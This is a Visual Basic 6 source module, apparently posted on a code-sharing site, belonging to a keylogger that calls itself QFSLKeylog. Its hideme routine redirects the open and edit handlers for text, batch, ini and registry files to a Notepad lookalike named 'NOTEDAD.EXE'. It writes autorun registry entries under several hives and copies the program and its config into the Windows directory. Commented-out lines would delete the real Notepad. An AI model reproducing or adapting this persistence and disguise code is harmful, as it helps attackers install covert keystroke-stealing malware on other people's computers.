📄 module3.bas
字号:
Attribute VB_Name = "Module2"
Option Explicit
Public AppPath As String
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public syspath2 As String
Private Declare Function GetTickCount Lib "kernel32" () As Long
Sub pause(howlong As Long)
Dim u%, tick As Long
tick = GetTickCount()
Do
u% = DoEvents
Loop Until tick + howlong < GetTickCount
End Sub
Public Function syspath() As String '得到system路径
On Error Resume Next
Dim len5 As Long
syspath = String(255, 0)
len5 = GetSystemDirectory(syspath, 256)
syspath = Left(syspath, InStr(1, syspath, Chr(0)) - 1)
syspath2 = Left(syspath, InStrRev(syspath, "\") - 1)
End Function
Public Sub hideme()
On Error Resume Next
Dim RegEdit As Object, i As Integer
Set RegEdit = CreateObject("WScript.Shell")
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\inifile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\regfile\shell\edit\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_CLASSES_ROOT\.dbt\", "DBTFILE"
RegEdit.regwrite "HKEY_CLASSES_ROOT\DBTFILE\shell\open\command\", "NOTEDAD.EXE"
Open syspath & "\IExplorer.dll .dbt" For Append As #1
Close #1
' If Not LCase(Dir(syspath & "\WBEM\Logs\qfsl.exe")) = "qfsl.exe" Then
' If Not UCase(Dir(syspath2 & "\NOTEPAD_BACKUP.EXE")) = "NOTEPAD_BACKUP.EXE" Then
'' If Dir(syspath & "\NOTEPAD.EXE") <> "" Then FileCopy syspath & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' If Dir(syspath2 & "\NOTEPAD.EXE") <> "" Then FileCopy syspath2 & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' Else
' FileCopy syspath2 & "\NOTEPAD_BACKUP.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' End If
' End If
' Kill syspath & "\NOTEPAD.EXE" 'system目录下或是system32下
' Kill syspath2 & "\NOTEPAD.EXE" 'winnt目录下或是WINDOWS下
FileCopy AppPath & "\QFSLKeylog.ini", syspath2 & "\QFSLKeylog.ini"
FileCopy AppPath & "\" & App.EXEName & ".exe", syspath2 & "\NOTEDAD.EXE"
' FileCopy AppPath & "\" & App.EXEName & ".exe", syspath & "\WBEM\Logs\backup.exe"
For i = 1 To 100
If Dir(syspath2 & "\QFSLKeylog.ini") <> "" Then Exit For
pause (50)
Next
pause (50)
If AppPath <> syspath2 Then Shell syspath2 & "\NOTEDAD.EXE", vbNormalFocus: End
End Sub
Public Sub uninstall()
On Error Resume Next
Dim RegEdit As Object
Set RegEdit = CreateObject("WScript.Shell")
Kill syspath2 & "\QFSLKeylog.ini"
Kill syspath2 & "\NOTEDAD.EXE"
' Kill syspath & "\WBEM\Logs\backup.exe"
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\inifile\shell\open\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\regfile\shell\edit\command\", "NOTEPAD.EXE %1"
RegEdit.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet"
RegEdit.regdelete "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_CLASSES_ROOT\.dbt\"
RegEdit.regdelete "HKEY_CLASSES_ROOT\DBTFILE\"
' FileCopy syspath & "\WBEM\Logs\qfsl.exe", syspath2 & "\NOTEPAD_BACKUP.EXE"
' Kill syspath & "\WBEM\Logs\qfsl.exe"
End Sub
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -